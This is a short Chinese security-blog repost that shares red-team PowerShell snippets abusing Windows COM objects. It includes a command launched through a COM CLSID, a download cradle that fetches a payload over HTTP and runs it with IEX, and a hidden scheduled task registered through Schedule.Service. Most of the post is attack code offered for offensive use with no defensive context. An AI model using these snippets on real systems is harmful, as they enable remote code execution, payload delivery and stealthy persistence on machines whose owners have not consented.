常用com组件分享

admin 2021年5月1日09:18:37评论86 views字数 1190阅读3分58秒阅读模式


分享红队行动中常用的Com组件,效果自测,绝对好用。



$handle = [activator]::CreateInstance([type]::GetTypeFromCLSID("E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E"))$handle.CommandLine = "cmd /c whoami"$handle.Start([ref]$True)



$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221")); $o.Open("GET", "http://127.0.0.1/payload", $False); $o.Send(); IEX $o.responseText;


$TaskName = [Guid]::NewGuid().ToString()$Instance = [activator]::CreateInstance([type]::GetTypeFromProgID("Schedule.Service"))$Instance.Connect()$Folder = $Instance.GetFolder("")$Task = $Instance.NewTask(0)$Trigger = $Task.triggers.Create(0)$Trigger.StartBoundary = Convert-Date -Date ((Get-Date).addSeconds($Delay))$Trigger.EndBoundary = Convert-Date -Date ((Get-Date).addSeconds($Delay + 120))$Trigger.ExecutionTimelimit = "PT5M"$Trigger.Enabled = $True$Trigger.Id = $Taskname$Action = $Task.Actions.Create(0)$Action.Path = “cmd.exe”$Action.Arguments = “/c whoami”$Action.HideAppWindow = $True$Folder.RegisterTaskDefinition($TaskName, $Task, 6, "", "", 3)
function Convert-Date {
param( [datetime]$Date
)
PROCESS { $Date.Touniversaltime().tostring("u") -replace " ","T" }}



from:https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

本文始发于微信公众号(鸿鹄实验室):常用com组件分享

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月1日09:18:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   常用com组件分享http://cn-sec.com/archives/235554.html

发表评论

匿名网友 填写信息